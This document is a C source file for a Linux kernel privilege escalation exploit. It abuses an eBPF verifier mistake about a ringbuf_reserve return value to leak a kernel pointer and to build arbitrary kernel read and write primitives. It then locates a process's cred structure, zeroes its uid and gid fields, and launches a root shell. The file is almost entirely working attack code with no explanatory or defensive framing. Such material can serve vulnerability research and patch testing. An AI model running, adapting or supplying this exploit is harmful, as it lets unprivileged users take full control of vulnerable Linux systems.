#include <signal.h>
#include <sys/prctl.h>
#include <sys/wait.h>

#include "bpf.h"
#include "config.h"
#include "debug.h"
#include "helper.h"

typedef struct {
    int comm_fd;
    int ringbuf_fd;

    int arbitrary_read_prog;
    int arbitrary_write_prog;

    pid_t processes[PROC_NUM];

    kaddr_t array_map;
    kaddr_t cred;

    union {
        u8 bytes[PAGE_SIZE*8];
        u16 words[0];
        u32 dwords[0];
        u64 qwords[0];
        kaddr_t ptrs[0];
    };
} context_t;

typedef struct {
    const char* name;
    int (*func)(context_t *ctx);
    int ignore_error;
} phase_t;

int create_bpf_maps(context_t *ctx)
{
    int ret = 0;

    ret = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(u32), PAGE_SIZE, 1);
    if (ret < 0) {
        WARNF("Failed to create comm map: %d (%s)", ret, strerror(-ret));
        return ret;
    }
    ctx->comm_fd = ret;

    if ((ret = bpf_create_map(BPF_MAP_TYPE_RINGBUF, 0, 0, PAGE_SIZE)) < 0) {
        WARNF("Could not create ringbuf map: %d (%s)", ret, strerror(-ret));
        return ret;
    }
    ctx->ringbuf_fd = ret;

    return 0;
}

int do_leak(context_t *ctx)
{
    int ret = -1;
    struct bpf_insn insn[] = {
        // r9 = r1
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // verifier believe r0 = 0 and r1 = 0. However, r0 = 0 and  r1 = 1 on runtime.

        // r7 = r1 + 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 8),

        // verifier believe r7 = 8, but r7 = 9 actually.

        // store the array pointer (0xFFFF..........10 + 0xE0)
        BPF_MOV64_REG(BPF_REG_6, BPF_REG_8),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 0xE0),
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8),

        // partial overwrite array pointer on stack

        // r0 = bpf_skb_load_bytes_relative(r9, 0, r8, r7, 0)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // r6 = 0xFFFF..........00 (off = 0xE0)
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
        BPF_ALU64_IMM(BPF_SUB, BPF_REG_6, 0xE0),

        
        // map_update_elem(ctx->comm_fd, 0, r6, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_8),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_6),
        BPF_MOV64_IMM(BPF_REG_4, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    int prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insn, sizeof(insn) / sizeof(insn[0]), "");
    if (prog < 0) {
        WARNF("Could not load program(do_leak):\n %s", bpf_log_buf);
        goto abort;
    }

    int err = bpf_prog_skb_run(prog, ctx->bytes, 8);

    if (err != 0) {
        WARNF("Could not run program(do_leak): %d (%s)", err, strerror(err));
        goto abort;
    }

    int key = 0;
    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
    if (err != 0) {
        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
        goto abort;
    }
    
    u64 array_map = (u64)ctx->ptrs[20] & (~0xFFL);
    if ((array_map&0xFFFFF00000000000) != 0xFFFF800000000000) {
        WARNF("Could not leak array map: got %p", (kaddr_t)array_map);
        goto abort;
    }

    ctx->array_map = (kaddr_t)array_map;
    DEBUGF("array_map @ %p", ctx->array_map);

    ret = 0;

abort:
    if (prog > 0) close(prog);
    return ret;
}

int prepare_arbitrary_rw(context_t *ctx)
{
    int arbitrary_read_prog = 0;
    int arbitrary_write_prog = 0;

    struct bpf_insn arbitrary_read[] = {
        // r9 = r1
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // verifier believe r0 = 0 and r1 = 0. However, r0 = 0 and  r1 = 1 on runtime.

        // r7 = (r1 + 1) * 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),

        // verifier believe r7 = 8, but r7 = 16 actually.

        // store the array pointer
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),

        // overwrite array pointer on stack

        // r0 = bpf_skb_load_bytes_relative(r9, 0, r8, r7, 0)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // fetch our arbitrary address pointer
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
        
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0),
        BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    arbitrary_read_prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, arbitrary_read, sizeof(arbitrary_read) / sizeof(arbitrary_read[0]), "");
    if (arbitrary_read_prog < 0) {
        WARNF("Could not load program(arbitrary_write):\n %s", bpf_log_buf);
        goto abort;
    }

    struct bpf_insn arbitrary_write[] = {
        // r9 = r1
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),

        // r0 = bpf_lookup_elem(ctx->comm_fd, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->comm_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        // if (r0 == NULL) exit(1)
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, 1),
        BPF_EXIT_INSN(),

        // r8 = r0
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0),

        // r0 = bpf_ringbuf_reserve(ctx->ringbuf_fd, PAGE_SIZE, 0)
        BPF_LD_MAP_FD(BPF_REG_1, ctx->ringbuf_fd),
        BPF_MOV64_IMM(BPF_REG_2, PAGE_SIZE),
        BPF_MOV64_IMM(BPF_REG_3, 0x00),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_reserve),

        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 1),

        // if (r0 != NULL) { ringbuf_discard(r0, 1); exit(2); }
        BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 5),
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0),
        BPF_MOV64_IMM(BPF_REG_2, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_ringbuf_discard),
        BPF_MOV64_IMM(BPF_REG_0, 2),
        BPF_EXIT_INSN(),

        // verifier believe r0 = 0 and r1 = 0. However, r0 = 0 and  r1 = 1 on runtime.

        // r7 = (r1 + 1) * 8
        BPF_MOV64_REG(BPF_REG_7, BPF_REG_1),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 1),
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 8),

        // verifier believe r7 = 8, but r7 = 16 actually.

        // store the array pointer
        BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_8, -8),

        // overwrite array pointer on stack

        // r0 = bpf_skb_load_bytes_relative(r9, 0, r8, r7, 0)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -16),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        // fetch our arbitrary address pointer
        BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_10, -8),
        
        BPF_LDX_MEM(BPF_DW, BPF_REG_0, BPF_REG_8, 0),
        BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 8),

        // if (r0 == 0) { *(u64*)r6 = r1 }
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),
        BPF_JMP_IMM(BPF_JA, 0, 0, 1),
        // else { *(u32*)r6 = r1 }
        BPF_STX_MEM(BPF_W, BPF_REG_6, BPF_REG_1, 0),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN()
    };

    arbitrary_write_prog = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, arbitrary_write, sizeof(arbitrary_write) / sizeof(arbitrary_read[0]), "");
    if (arbitrary_write_prog < 0) {
        WARNF("Could not load program(arbitrary_write):\n %s", bpf_log_buf);
        goto abort;
    }

    ctx->arbitrary_read_prog = arbitrary_read_prog;
    ctx->arbitrary_write_prog = arbitrary_write_prog;
    return 0;

abort:
    if (arbitrary_read_prog > 0) close(arbitrary_read_prog);
    if (arbitrary_write_prog > 0) close(arbitrary_write_prog);
    return -1;
}

int spawn_processes(context_t *ctx)
{
    for (int i = 0; i < PROC_NUM; i++)
    {
        pid_t child = fork();
        if (child == 0) {
            if (prctl(PR_SET_NAME, __ID__, 0, 0, 0) != 0) {
                WARNF("Could not set name");
            }
            uid_t old = getuid();
            kill(getpid(), SIGSTOP);
            uid_t uid = getuid();
            if (uid == 0 && old != uid) {
                OKF("Enjoy root!");
                system("/bin/sh");
            }
            exit(uid);
        }
        if (child < 0) {
            return child;
        }
        ctx->processes[i] = child;
    }

    return 0;
}

int arbitrary_read(context_t *ctx, kaddr_t addr, u64 *val, int bpf_size)
{
    ctx->ptrs[0] = addr;
    ctx->ptrs[1] = addr;

    int err = bpf_prog_skb_run(ctx->arbitrary_read_prog, ctx->ptrs, 0x100);
    if (err != 0) {
        WARNF("Could not run program(arbitrary_read): %d (%s)", err, strerror(err));
        return -1;
    }

    int key = 0;
    err = bpf_lookup_elem(ctx->comm_fd, &key, ctx->bytes);
    if (err != 0) {
        WARNF("Could not lookup comm map: %d (%s)", err, strerror(err));
        return -1;
    }
    
    *val = ctx->qwords[0];
    return 0;
}

int arbitrary_write(context_t *ctx, kaddr_t addr, u64 val, int bpf_size)
{
    int err = 0;
    ctx->qwords[0] = bpf_size == BPF_DW ? 0 : 1;
    ctx->qwords[1] = val;

    err = bpf_update_elem(ctx->comm_fd, &err, ctx->qwords, 0);
    if (err != 0) {
        WARNF("Could not set up value on program(arbitrary_write): %d (%s)", err, strerror(err));
        return -1;
    }

    ctx->ptrs[0] = addr;
    ctx->ptrs[1] = addr;

    err = bpf_prog_skb_run(ctx->arbitrary_write_prog, ctx->ptrs, 0x100);
    if (err != 0) {
        WARNF("Could not run program(arbitrary_write): %d (%s)", err, strerror(err));
        return -1;
    }

    return 0;
}

int find_cred(context_t *ctx)
{
    for (int i = 0; i < PAGE_SIZE*PAGE_SIZE ; i++)
    {
        u64 val = 0;
        kaddr_t addr = ctx->array_map + PAGE_SIZE + i*0x8;
        if (arbitrary_read(ctx, addr, &val, BPF_DW) != 0) {
            WARNF("Could not read kernel address %p", addr);
            return -1;
        }

        // DEBUGF("addr %p = 0x%016x", addr, val);

        if (memcmp(&val, __ID__, sizeof(val)) == 0) {
            kaddr_t cred_from_task = addr - 0x10;
            
            if (arbitrary_read(ctx, cred_from_task + 8, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 8", cred_from_task);
                return -1;
            }

            if (val == 0 && arbitrary_read(ctx, cred_from_task, &val, BPF_DW) != 0) {
                WARNF("Could not read kernel address %p + 0", cred_from_task);
                return -1;
            }

            if (val != 0) {
                ctx->cred = (kaddr_t)val;
                DEBUGF("task struct ~ %p", cred_from_task);
                DEBUGF("cred @ %p", ctx->cred);
                return 0;
            }
            

        }
    }
    
    return -1;
}

int overwrite_cred(context_t *ctx)
{
    if (arbitrary_write(ctx, ctx->cred + OFFSET_uid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }
    if (arbitrary_write(ctx, ctx->cred + OFFSET_gid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }
    if (arbitrary_write(ctx, ctx->cred + OFFSET_euid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }
    if (arbitrary_write(ctx, ctx->cred + OFFSET_egid_from_cred, 0, BPF_W) != 0) {
        return -1;
    }

    return 0;
}

int spawn_root_shell(context_t *ctx)
{
    for (int i = 0; i < PROC_NUM; i++)
    {
        kill(ctx->processes[i], SIGCONT);
    }
    while(wait(NULL) > 0);

    return 0;
}

int clean_up(context_t *ctx)
{
    close(ctx->comm_fd);
    close(ctx->arbitrary_read_prog);
    close(ctx->arbitrary_write_prog);
    kill(0, SIGCONT);
    return 0;
}

phase_t phases[] = {
    { .name = "create bpf map(s)", .func = create_bpf_maps },
    { .name = "do some leak", .func = do_leak },
    { .name = "prepare arbitrary rw", .func = prepare_arbitrary_rw },
    { .name = "spawn processes", .func = spawn_processes },
    { .name = "find cred (slow)", .func = find_cred },
    { .name = "overwrite cred", .func = overwrite_cred },
    { .name = "spawn root shell", .func = spawn_root_shell },
    { .name = "clean up the mess", .func = clean_up , .ignore_error = 1 },
};

int main(int argc, char** argv)
{
    context_t ctx = {};
    int err = 0;
    int max = sizeof(phases) / sizeof(phases[0]);
    if (getuid() == 0) {
        BADF("You are already root, exiting...");
        return -1;
    }
    for (int i = 1; i <= max; i++)
    {
        phase_t *phase = &phases[i-1];
        if (err != 0 && !phase->ignore_error) {
            ACTF("phase(%d/%d) '%s' skipped", i, max, phase->name);
            continue;
        }
        ACTF("phase(%d/%d) '%s' running", i, max, phase->name);
        int error = phase->func(&ctx);
        if (error != 0) {
            BADF("phase(%d/%d) '%s' return with error %d", i, max, phase->name, error);
            err = error;
        } else {
            OKF("phase(%d/%d) '%s' done", i, max, phase->name);
        }
    }
    return err;
}